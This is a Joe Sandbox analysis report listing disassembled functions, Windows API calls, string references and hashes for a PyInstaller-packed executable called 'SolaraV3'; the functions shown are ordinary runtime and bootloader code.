Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: e0eb0081e8cb1c4685abdfb09c0e79dca2cc258b0cd8ac2bead7fa3454d9d654
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: E211B921B18B4986E7608B52F85532DA3A0FB88FE4F044235E96EC7794DF3CD8258740

Function 00007FF6DC708ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708F5A

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC70906A

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction ID: f4adc7efcbf92c2efcfbd135f9b0ccb1762818622b6cbbf5b503a55482c01894
Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction Fuzzy Hash: 44418F62A1968A81EA309B13E5002BE73A4FB85BC4F444136DF9D97799DE3EE523D700

Function 00007FF6DC71B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B30D
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B33A
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B34B
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B35C
SetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B377

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 3ba90b57abc033802a6f73968ec955b1af2912bec75d2ea29a7ab1daa42ad204
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: 14116030F0C68A86FA585729566113D62429F447F0F146736E83EC76D6DE2CA4738300

Function 00007FF6DC702910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E

Strings

Error [ANSI Fallback], xrefs: 00007FF6DC7029FF
%s: %s, xrefs: 00007FF6DC7029E8
Error, xrefs: 00007FF6DC702A0E
[PYI-%d:ERROR] , xrefs: 00007FF6DC702966

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 52007a145e6001d1a4f92277134af69f6b3d16f96283a07eddd00bc2d0bec1bb
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 0D31F623B18A8956E7209766A8512EF66A4BF887D4F400133FE8DD3789EF3CD1578700

Function 00007FF6DC702390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6DC7023C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6DC70248E
DeleteObject.GDI32 ref: 00007FF6DC7024C1
DestroyIcon.USER32 ref: 00007FF6DC7024D3

Strings

Unhandled exception in script, xrefs: 00007FF6DC7023F8

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction ID: f87a8971a6a07dffa7b8405072eba2ab3beb5a87b21ef52bd23ffd51ff5ec390
Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction Fuzzy Hash: A1317372A19A8689EB20DF25E8652FD6360FF88784F540136EA4E87B99DF3CD116C700

Function 00007FF6DC702B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6DC70918F,?,00007FF6DC703C55), ref: 00007FF6DC702BA0
MessageBoxW.USER32 ref: 00007FF6DC702C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF6DC702BA8
Warning, xrefs: 00007FF6DC702C1D
WARNING, xrefs: 00007FF6DC702BAF

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 4d3c1e3fea9780c66f6163453185013722541ed139eca782b23bf3d1631b11b3
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: FF21DE62708B8582E7219B15F8907EE63A4FB88784F400136EA8D93659DE3CE266C740

Function 00007FF6DC702710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6DC701B99), ref: 00007FF6DC702760

Strings

Error [ANSI Fallback], xrefs: 00007FF6DC7027CF
Error, xrefs: 00007FF6DC7027DE
[PYI-%d:%s] , xrefs: 00007FF6DC702768
ERROR, xrefs: 00007FF6DC70276F

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 3d73c88f342bad0709f15477228df80d71bb404cafae940d004e271bdf60c224
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 52219272A18B8946E720DB55F8517EAA3A4FB88384F400136FE8D93659DF7CD15A8740

Function 00007FF6DC719A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6DC719AAD
GetProcAddress.KERNEL32 ref: 00007FF6DC719AC3
FreeLibrary.KERNEL32 ref: 00007FF6DC719AEA

Strings

CorExitProcess, xrefs: 00007FF6DC719ABC
mscoree.dll, xrefs: 00007FF6DC719AA4

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: 60ba1b9f53e9d0e0ca73b16e237b5a41758d923d8acb65d232e4b7e1a499a37d
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 58F06221B0970A81EA209B24E4A437EA360FF497A1F541237D67E865E4DF2CE05BC340

Function 00007FF6DC729368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6DC729390
_set_statfp.LIBCMT ref: 00007FF6DC7293AB
_set_statfp.LIBCMT ref: 00007FF6DC7293C7
_set_statfp.LIBCMT ref: 00007FF6DC729403

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: d7fcc1fdc0fdb477ba1f4b37f16fb16faab36ff8ad3d1c3f55781e2e7658b93e
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 17115432E5CA0B01FA781165E4B537D9150AF59374E0C4637FA6ED62D7DE6C69638100

Function 00007FF6DC71B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B407
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B418

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: 51120308e5bf071dd94d868f5809307f97b34f3bc09d3dc409e30dfe0c420366
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: 90111F70F0864A81FA58972A956117D62519F447F0F58A336E93DC66D6DE2CA4638201

Function 00007FF6DC71B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6DC71B235
FlsSetValue.KERNEL32 ref: 00007FF6DC71B254
FlsSetValue.KERNEL32 ref: 00007FF6DC71B27C
FlsSetValue.KERNEL32 ref: 00007FF6DC71B28D
FlsSetValue.KERNEL32 ref: 00007FF6DC71B29E

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: 3f78b665e5481f3394af489ebaf854d9d232443db26f784891be9587faa9d7f3
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: 03110960F0C60F85F9686279457217E12824F4A770F18A736E93ECA6D2DD2CB4679311

Function 00007FF6DC715FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC715FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC716106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7161BC

Strings

verbose, xrefs: 00007FF6DC715FB0

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: acca1cefd9955db0fb23f69d374c24db7b22b3884288c6a271468267b466f64d
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 7C91D072A08A4A85F7618EACD4607BD37A5FB40BA4F44A137DA5D833D6DE3CE4279300

Function 00007FF6DC71FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71FEA7

Part of subcall function 00007FF6DC717A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC717A59

Strings

ccs, xrefs: 00007FF6DC71FDE2
UTF-16LEUNICODE, xrefs: 00007FF6DC71FE45
UTF-8, xrefs: 00007FF6DC71FE26

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 15847c40128809faf47aee091a7e908b096008143f76c1c92c40a1cbc4d07e5f
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 9181D172E1C64B85F7649F2D813227C36A0AB11B88F55A037EA49D72D5CF2CE9279301

Function 00007FF6DC70D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6DC70D673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6DC70D70A
RtlUnwindEx.KERNEL32 ref: 00007FF6DC70D764

Strings

csm, xrefs: 00007FF6DC70D6F1

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: 2bf336eb9efcc45af238ce5be99ebec237e132ad660c3322bdd9308f1f0f4caa
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: DB519332A1970A8ADB14CB26E44467C73A1FB54B98F504136FA4D87784EF7EE862D700

Function 00007FF6DC70EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6DC70EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6DC70EF83

Strings

MOC, xrefs: 00007FF6DC70EF4B
RCC, xrefs: 00007FF6DC70EF53

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 3642e66e2c657ee63a75e3045ced45d3b170a8ac51a78ca35b94e54253fc2eca
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 35617232908BC985D7609B16E4403AEB7A0FB857D4F044226EBDC87B56DF7DE1A1CB00

Function 00007FF6DC70F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6DC70F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6DC70F398

Strings

csm, xrefs: 00007FF6DC70F3EA
csm, xrefs: 00007FF6DC70F2D2

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 571916d6c6b2b251612df15d85af1462785746471ce510bc39ed9345e676af98
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 12518E72A0834A86EB648A23904436C77B0FB55B94F14413BFA9DC7B85CF3DE462D705

Function 00007FF6DC707E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6DC70352C,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC707F32

Strings

\, xrefs: 00007FF6DC707E97
%s%c, xrefs: 00007FF6DC707EA4
%.*s, xrefs: 00007FF6DC707EEB

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
